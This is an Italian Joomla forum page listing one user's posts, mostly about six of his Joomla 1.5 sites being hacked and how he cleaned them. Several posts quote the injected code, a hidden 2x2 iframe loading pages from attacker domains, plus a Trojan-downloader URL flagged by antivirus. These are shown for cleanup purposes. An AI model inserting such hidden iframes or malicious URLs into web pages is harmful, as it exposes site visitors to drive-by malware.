Visualizza post

Questa sezione ti permette di visualizzare tutti i post inviati da questo utente. N.B: puoi vedere solo i post relativi alle aree dove hai l'accesso.


Post - joored

Pagine: 1 [2] 3 4 5 ... 7
21
Joomla! 1.5 / Re:componente per integrare FACEBOOK
« il: 14 Feb 2011, 12:37:09 »
Ciao Zola,
vai in gestione utenti
selezioni l'utente superadministrator con il quale stai lavorando
E nei parametri: Editor utente selezioni NO EDITOR e salvi
Poi vai ad aprire il modulo che hia creato e incolli nuovamente il codice e salvi
Così dovrebbe funzionare.
Ricordati poi di ripristinare l'Editor utente ...
Spero di esserti stato utile, ciao


22
L'indirizzo della pagina che dovrei inserire ha questa struttura

http://www.facebook.com/people/ecc. ecc.

Ho provato ad inserire ma non da risultati ... avete idea di come risolvere?
Grazie

23
Articoli della community / Re:YaSB Shoutbox in un sito
« il: 28 Gen 2011, 12:39:11 »
In sostanza mi dice che la generazione del messaggio di benvenuto non è riuscito -e  che Almeno un messaggio è necessario per funzionare  AJAX.

Cosè questo messaggio di benvenuto? Come posso crearlo manualmente?

L'ho reinstallato e ora compare nel modulo, però vorrei capire:

1) è necessario essere utenti registrati per utilizzarla.
     Ma è possibile renderla utilizzabile senza la necessità di registrarsi?

2) Quando invio un messaggio non mi compare niente ???

24
Articoli della community / Re:YaSB Shoutbox in un sito
« il: 28 Gen 2011, 11:55:08 »
Grazie Gabrielev per la segnalazione. Io ho installato il componente:

Mi crea regolarmente le tabelle del database

Checking table '#__yasb': not existing
Trying to create table '#__yasb': done
Checking table '#__yasb_bans': not existing
Trying to create table '#__yasb_bans': done
Checking table '#__yasb_smilies': not existing
Trying to create table '#__yasb_smilies': done
Checking table '#__yasb_words': not existing
Trying to create table '#__yasb_words': done
Checking table '#__yasb_conf': not existing
Trying to create table '#__yasb_conf': done

ma mi segnala un errore che non permette il funzionamento del componente:

Checking shout's table: generating welcome shout:failed - At least one shout is required for AJAX to work.

Nel pannello di controllo del componente mi dice anche:

Component:    2.0.3beta6 - Error reading latest version from update server

Hai idea di cosa si tratti e come risolvere?

Un saluto, ciao

25
Sicurezza / Re:Protezione da SQL injection e LFI
« il: 05 Ott 2010, 20:55:20 »
Grazie mmleoni,
io l'ho installato ma mi chiedo
come va configurato?
Io ho lasciato la configurazione di default ad eccezione di:

- Send Email Alert on injection/inclusion = SI
- Mail to notify attack = mia@mail.it

Per il resto è meglio lasciare tutto immutato?

26
Makjla,
bonificare i file index.php e index.html non basta ...
Il problema, a quanto pare, dipende da un trojan che si è installato sul computer ... per cui occorre:

1) PRIORITARIAMENTE, prima di ogni altra operazione, fare una scansione accurata (in modalità provvisoria) del proprio computer (io ne ho trovato uno che aveva attinenza con l'attacco);

2) cambiare user+pass dell'accesso ivi inclusi quelli ftp e del database

3) cambiare user+pass del super amministratore

4) scaricare sul proprio computer, in un'apposita cartella, tutto il sito attaccato

5) Passare la cartella con l'antivirus accuratamente

5) munirsi di un programma di Search & Replace (ce ne sono gratuiti)

6) cercare con il programma di Search & Replace le stringhe di codice maligno e cancellarle o sostituirle con il codice opportuno (io ho cercato con queste parole chiave: sytratesthj e 12rret, ma potrebbero essere altre, dipende dall'attacco)

7) cancellare via ftp sul server tutte le cartelle e files

- trasferire via ftp sul server le cartelle ed i files bonificati

9) aggiornare joomla all'ultima versione 1520 (se trattasi di versione precedente) e aggiornare tutti i componenti,plugin e moduli

10) incrociare le dita!

27
Proprio così Mau,
difatti il mio computer ha rilevato e bloccato un
Codice: [Seleziona]
Trojan-Downloader.Java.Agent.hi http://12rret.co.cc/client.zip/a0ee3d65141.class
l'indirizzo è quello contenuto nel codice maligno che viene inserito nei files index

a quali altre compromissioni alludi Mau?

28
First, hanno hakerato il tuo sito!
Leggi questo post: http://forum.joomla.it/index.php/topic,114777.0.html.
Hanno modificato il file index.php e index.html
Aprili e togli il codice aggiunto da loro come descritto nel post che ti ho segnalato sopra.
Ciao

29
Grazie Seflex,
Citazione
Scarica tutte le cartelle del sito sul pc usando il programma total comander cerca ad esempio http://
e vedi tutte url che trova ed eventualmente elimina.
Ti consiglio di cambiare i tuoi dati di acceso ftp, mysql e cambiare il nome utente e password administrator.
E puoi magari installa un componente per la protezione e stai attento ai permessi di file configuration.php

Il file configuration.php ha i permessi settati 0664, va bene così?

30
Si lo so Spider ... da Estensioni-> Installa/Disinstalla -> Moduli (Componenti, Plugin etc..), pensavo ci fosse un metodo per avere un elenco complessivo

31
Con File Zilla vedi i permessi delle cartelle e dei file.
Le cartelle vanno tenute a 0775 e i file a 0664 .... o mi sbaglio?

32
Li scarico in locale ( >:( d'altronde sono solo 6 siti belli pesanti) e li controllo. Ci vorranno due tre gioni per farlo, ma non ho alternative,
Come giustamente dice maicolstaip cambio le credenziali ftp;

Cambio user e password di accesso.

Ma come posso avere un elenco veloce di tutti i componenti, plugin e moduli installati? Per poter controllare ad auno ad uno gli aggiornamenti?

33
Alexred ... si sono ospitati dallo stesso hosting (ar_ _ a), sto provvedendo a segnalare loro il fatto.
Quanto ai componenti esterni installati, solo due hanno in comune sobi2.

Avevo iniziato a ripulire un sito e quando ho finito dopo meno di un'ora ho subito un altro attacco.

Come posso avere certezza di aver cancellato tutto?

Come faccio ad avere velocemente un elenco di tutti i componenti, plugin e moduli installati in ciascun sito ?

34
Joomla! 1.5 / Re:errore pagina index di joomla
« il: 02 Ott 2010, 15:48:27 »
Purtroppo sono stato riattaccato stanotte.
Ora, per evitare di doverlo fare uno per uno, sto trasferendo sul server via ftp tutte le cartelle e i file di joomla 1520-originali sovrascrivendo quelle già presenti sul server.
Una volta completato controllerò le cartelle e i file.

Un disastro ... se penso che dovrò rifare per altre 5 volte l'operazione ...

Piuttosto, bisognerebbe capire come hanno fatto!
Due siti erano aggiornati alla 1520 (e aggiornati erano anche i pochi componenti installati) ... e quindi non c'è da stare tanto tranquilli ...

35
Joomla! 1.5 / Re:errore pagina index di joomla
« il: 02 Ott 2010, 02:07:54 »
Nella cartella tmp io ho ora solo il file index.html che ho ripulito ...

Ma c'è qualcosa che ci sfugge .... temo che se non si incide sulla causa vera ... il problema si ripeterà ancora

36
Joomla! 1.5 / Re:errore pagina index di joomla
« il: 02 Ott 2010, 01:50:24 »
Devo cancellare tutto il contenuto della cartella tmp (a_manifest.xml)!

37
Joomla! 1.5 / Altro attaco
« il: 02 Ott 2010, 01:44:20 »
Ho subito un altro attacco in questo momento su un sito che avevo appena finito di ripulire!!

Prima il codice era:
Codice: [Seleziona]
echo JResponse::toString($mainframe->getCfg('gzip'));<html><body><iframe

src='http://sytratesthj.co.cc/1/go.php?sid=13' width='2' height='2'

frameborder='0'></iframe></body></html>

Stavolta il codice è:
Codice: [Seleziona]
src='http://12rret.co.cc/B1rnGksrKnZUbbm5aelF6VbjSUM3gtlH' width='2' height='2' frameborder='0'></iframe></body></html>Il sito era aggiornato alla 1520.
A quanto pare è inutile ripulirli perché tanto dopo poche ore vengono riattaccati.
Mi arrendo... non so come rimediare

38
Joomla! 1.5 / Re:errore pagina index di joomla
« il: 02 Ott 2010, 01:20:49 »
Non avevo badato ai files index.html ... devo ripulire pure quelli acc!
Anche i file di backup hanno corrotto

39
Joomla! 1.5 / Re:errore pagina index di joomla
« il: 02 Ott 2010, 00:45:26 »
Aggiornare alla 1520 non basta.
La stessa cosa è capitata a me ieri http://forum.joomla.it/index.php/topic,114777.0.html

40
Vari miei siti (6) in joomla 1518 e 1520 questa settimana sono stati hakerati.

Scomparsi i siti viene visualizzato a schermo il seguente messaggio:

Codice: [Seleziona]
Parse error: syntax error, unexpected '<' in /web/htdocs/www._______.it/home/index.php

on line 88

Impossibile entrare anche lato amministrativo.

In sostanza questi idiot_ hanno corrotto tutti i file index.php di ciascun sito (ivi

inclusi i file delle copie di backup, template, ecc..) inserendo un reindirizzamento.

Reindirizzamento fallito per fortuna perché il codice è stato inserito in modo errato.
Ma il danno comunque l'hanno fatto!

Per risolvere ho dovuto aprire ogni file index.php e alla linea 88

sostituire

Codice: [Seleziona]
echo JResponse::toString($mainframe->getCfg('gzip'));<html><body><iframe

src='http://sytratesthj.co.cc/1/go.php?sid=13' width='2' height='2'

frameborder='0'></iframe></body></html>

con

Codice: [Seleziona]
echo JResponse::toString($mainframe->getCfg('gzip'));
Quelli 1518 li sto aggiornando alla 1520 ma mi chiedo:
1) come essere certo di aver ripulito tutti i file corrotti?
2) come fare per impedire che ciò si verifichi ancora?

Aggiornare alla 1520 non basta.

Pagine: 1 [2] 3 4 5 ... 7
Host

Torna su